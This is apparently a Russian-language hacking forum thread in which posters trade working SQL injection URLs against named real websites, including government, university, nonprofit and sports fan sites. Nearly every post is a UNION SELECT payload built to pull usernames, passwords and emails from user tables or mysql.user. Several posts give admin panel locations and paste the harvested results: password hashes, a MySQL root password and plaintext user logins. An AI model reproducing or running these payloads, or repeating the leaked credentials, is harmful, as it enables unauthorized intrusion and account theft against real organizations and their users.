Железо Code: http://www.legionhardware.com/document.php?id=-11111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(name,char(58),password),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users/* Демократия в Америке Code: http://www.dfalink.com/event.php?id=-11111+UNION+SELECT+1,concat(email,char(58),password),3,4,5,6,7,8,9,10,concat(USER(),char(58),VERSION(),char(58),DATABASE()),12,13,14,15,16,17,18,19,20,21,22,23,24+from+members/* Правда траблы с кодировкой пасса
mc-laren.ru Code: http://www.mc-laren.ru/news.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12+from+users/* а еще там есть форум...
Для НЕлюбителей косметики: Code: _http://www.wizaz.pl/porady/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/ Админка сайта тут: _http://www.wizaz.pl/porady/admin.php
70 email'ов))) kontrudar.ru Code: http://www.kontrudar.ru/material.php?id=15+and+0=-1+union+select+email,2,3,4,5,null,7,8,9,10,11,12,13+from+ic_subscribers+limit+70,1/* тайтл пробелы убирать надо
Клуб Выпускников Московского Физико-Технического Института www.miptclub.ru Code: http://miptclub.ru/inner/modules/gallery/gallery.php?act=show_gallery&id=-1+union+sel ect+convert(version ()+using+binary)/ * Admin: amavis Password(hash):623deab31fd6dd48 Админка: www.miptclub.ru/admin Уже мона коллекционировать - прошлый раз ассоциация выпускников МГИМО, теперь МФТИ!
__http://www-illigal.ge.uiuc.edu/system/reports/abstract.php?id=339992+union+select+1,2,3,4,5,6,AES _DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9,10--
Center For Law and Social Policy Code: http://www.clasp.org/publications.php?id=-1111+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+user/*
sql-inj Футбол. Луч-Энергия (Неофициальный сайт) Сайт: http://luch-vlad.ru/index.php уязвимость: http://luch-vlad.ru/index.php?option=com_datsogallery&func=detail&id=' подобранные таблицы: jos_users подобранные поля: username,password,email,name 1960 организмов admin:8e16abc167627ba17495079c609efa6d (111280) админка форум 2155 организмов
Ну, во-первых, не все сайты интересные и посещаемые, уязвимости есть не на всех, а на многих из тех, которые уязвимы, не всегда получается подобрать названия полезных таблиц. И еще реже получается попасть в админку и шелл заюзать. Плюс бывают интересные особенности, фильтрации и т.п.
Что касается аспа... Тут какая-то турецкая муть: _http://www.banaz.bel.tr/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin для получения пасса меняем на "sifre" Админка валяется тут: http://www.banaz.bel.tr/admin/kontrol.asp
.gov Code: http://www.maineservicecommission.gov/MVF/article.php?ID=-111+UNION+SELECT+1,2,concat(USER(),char(58),VERSION(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/*
sql-inj Футбол. Сайт: www.liverpoolfc.ru уязвимость: http://www.liverpoolfc.ru/news.php?id=1673' подобранные таблицы: users подобранные поля: user_name,user_pass,user_id 1:Jari:034054de62d75ca7 админка Не окончено: http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - Проблемы с выводом
Code: http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-1111+UNION+SELECT+1,2,name,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+2,1/* .gov Code: http://www.dswd.gov.ph/ProgProj.php?id=-1111+UNION+SELECT+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/* MySQL root:zaq12345
Code: http://poetry.h1.ru/article.php?sid=-526+union+select+1,2,3,4,password,email,7,username,9,10,11+from+members/* user:perfilov password:248192 email:[email protected] Code: http://outyourbackdoor.com/article.php?id=-684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*
nero.com Code: http://www.nero.com/eng/showpress.php?id=-1+union+select+1,2,3/* stpatsfc.com Code: http://www.stpatsfc.com/news.php?id=-1+union+select+1,2,3/*
www.sdg.ncsa.uiuc.edu Национальный Центр высокоэффективных вычислительных ресурсов NCSA Code: http://sdg.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1+union+select+1,concat(user(),0x203a20,database()),3,4,5,6,7,8,9,10/*